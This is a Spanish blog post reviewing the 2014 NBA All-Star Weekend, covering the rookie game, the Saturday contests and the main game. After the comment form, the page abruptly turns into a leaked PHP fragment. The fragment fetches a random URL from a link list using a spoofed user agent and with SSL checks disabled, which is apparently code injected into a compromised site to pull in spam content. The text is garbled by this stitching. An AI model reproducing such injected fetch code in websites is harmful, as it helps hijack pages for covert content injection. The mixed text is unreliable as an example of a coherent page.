Sombras y luces en el ASW 2014

17 de February de 2014 por TheDeerHunter

Terminó la “fiesta del baloncesto”, que la llaman algunos. La polémica rodea al evento y hemos de admitir que la edición de este año ha dado más argumentos a la corriente crítica que a sus defensores.

El caso es que el evento comenzó bastante bien. El “Rising Star Challenge” o, como decimos aquí, el “partido de los rookies” moló. Podríamos calificarlo como el mejor que hemos visto nunca. Por una vez los chavales se dejaron de paridas y se dedicaron a jugar. Como es natural no es que viéramos defensas feroces o competitividad como si hubiera un anillo en juego, pero apreciamos una actitud radicalmente distinta a la que nos habían ofrecido los últimos años. El partido nos dejó algunos detalles espectaculares. El inmenso dominio de Andre Drummond, a la postre MVP a pesar de que Anthony Davis no quiso ponérselo demasiado fácil y, por encima de todo, el magnífico duelo entre Waiters y Tim Hardaway Jr. que levantó a más de uno de sus asientos.

Alguno soltó la broma de que Chris Webber no es capaz de ganar ni las pachangas. Ahí la dejo. 

El sábado la cosa empeoró. Como alguno comentamos no hubiera sido una velada particularmente horrenda de no haber sido por un formato incomprensible para el concurso de mates. Los aperitivos del concurso de tiro y el de habilidades fueron lo que habitualmente son pero los “platos fuertes” tradicionales dejaron más sombras que luces. Lo salvable fue el excelso desempate de Belinelli…

… y el gran mate ganador de Wall.

Casi podríamos decir que por la red trascendió más el concurso de mates de la D-League y, sobre todo, la actuación del secretario de Educación en el partido de las celebrities. Arne, pedazo de jugón, vente para España que te votamos.

Por último, el partido de las estrellas. Batió montones de récords y dejó algunas jugadas preciosas, pero la tensión brilló por su ausencia más que en la mayoría de ediciones.

Irving, MVP en su salsa, y Melo lograron levantar un partido que por momentos tenían dominado Griffin, Durant y el resto de los jugadores del Oeste. Todo bastante olvidable.

En definitiva. Termina el descanso y viene lo bueno. De aquí hasta el final todo a cara de perro. Sólo puede quedar uno.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>